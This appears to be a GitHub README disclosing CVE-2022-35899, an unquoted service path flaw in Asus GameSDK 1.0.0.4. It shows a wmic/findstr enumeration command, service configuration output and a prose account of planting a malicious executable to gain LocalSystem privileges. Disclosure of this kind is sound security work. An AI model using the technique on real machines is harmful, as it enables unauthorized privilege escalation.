angelopioamirante/CVE-2022-35899

Unquoted Service Path Asus GameSdk

CVE-2022-35899

Unquoted Service Path Asus GameSdk

Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)

Date: 07/14/2022

Exploit Author: Angelo Pio Amirante

Version: 1.0.0.4

Tested on: Windows 10

Patched version: 1.0.5.0

Step to discover the unquoted service path:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Info on the service:

C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

Exploit

If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS" folder or in "C:" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".

Impact

An attacker can elevate his privileges on the system.

POC Video

https://youtu.be/u_8JMIgn-5g